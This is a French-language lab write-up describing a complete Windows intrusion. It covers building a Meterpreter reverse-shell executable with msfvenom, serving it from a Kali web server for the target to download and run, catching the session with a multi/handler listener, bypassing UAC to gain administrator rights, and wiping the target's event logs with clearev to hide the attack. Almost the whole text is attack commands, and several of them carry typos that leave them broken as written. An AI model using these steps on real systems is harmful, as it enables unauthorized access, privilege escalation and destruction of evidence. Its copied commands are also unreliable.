Obtenir les privilèges d'administrateur système et supprimer toutes les traces
Obtenir les privilèges d'administrateur système et supprimer toutes les traces de piratage Ce TP se déroulera en cinq phases Etape1 : Création du Payload Etape2 : Placement du Payload dans le dossier www pour faciliter le partage avec la cible. Etape3 : Téléchargement et exécution du Payload sur la machine cible via l’ip de la machine Kali. Etape4 : Lancement de notre serveur d’écoute avec MSFCONSOLE. Etape5 : Effacer nos traces. Document produit par Saliou Thiobane NB : Nous allons ici jeter un coup d’œil sur le contenu du fichier log de notre machine cible avant de mener l’attaque. Image1-2 : logs de la machine cible avant l’attaque : Etape 1 : Création du Payload ! Msfvenom -a x86 - - platfom windows -p windows/meterprter/reverse_tcp lhost=« ip de la machine kali » lport=3333 -f exe -o NomDuFichier.exe Etape 2 : Placement du Payload dans le dossier www pour facilité le partage avec la cible. Ensuite démarrer le serveur apache pour que notre dossier de partage (serveur web) soit accessible à distance via l’ip de la machine Kali. Etape 3 : Téléchargement et exécution du Payload sur la machine cible via l’ip de la machine Kali Sur le navigateur de la cible saisir l’ip de Kali 192.168.1.X/nomdufichier.exe Etape 4 : Lancement de notre serveur d’écoute avec MSFCONSOLE use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhots « ip de la machine kali » set lport 3333 exploit Une fois que la cible exécute notre payload nous obtenons un meterpreter. Bingooo !!! Après avoir obtenu l’accès nous devons effacer par la suite nos traces pour ne pas être repérer. Allons-y !!! Sur le meterpreter nous allons taper la commande clearev qui va nettoyer les logs de la machine cible. Ici le souci, si l’on exécute cette commande naturellement le système nous bloque car nous ne disposons pas les droits nécessaires pour faire cette action car nous somme connecter en tant utilisateur simple hors, pour faire cette action nous devons avoir plus de privilèges, se connecter en tant que « admin system » A ce niveau nous allons mettre notre session en arrière-plan pour la récupérer plus tard avec la commande « background » puis on fait un search uac (User Account Control) Choisir l’option1 et renseigner les options avec la commande Set Payload Set Lhost Set Lport (8080) Set session 1 (la session qui a été mise en arrière-plan) exploit Une fois l’exploit réussi ou constatons avoir les droits requis pour bypasser les UAC (User Account Control) RMQ : sur l’image ci-haut nous voyons clairement que l’on possède les droits d’administrateur sur le système de la cible. Etape5 : Suppression des logs de la cible Voilà avec la commande clearev nous avons pu effacer nos traces uploads/Industriel/ obtenir-les-privileges-d-x27-administrateur-systeme-et-supprimer-toutes-les-traces-de-piratage.pdf
Documents similaires










-
37
-
0
-
0
Licence et utilisation
Gratuit pour un usage personnel Attribution requise- Détails
- Publié le Dec 07, 2022
- Catégorie Industry / Industr...
- Langue French
- Taille du fichier 0.8176MB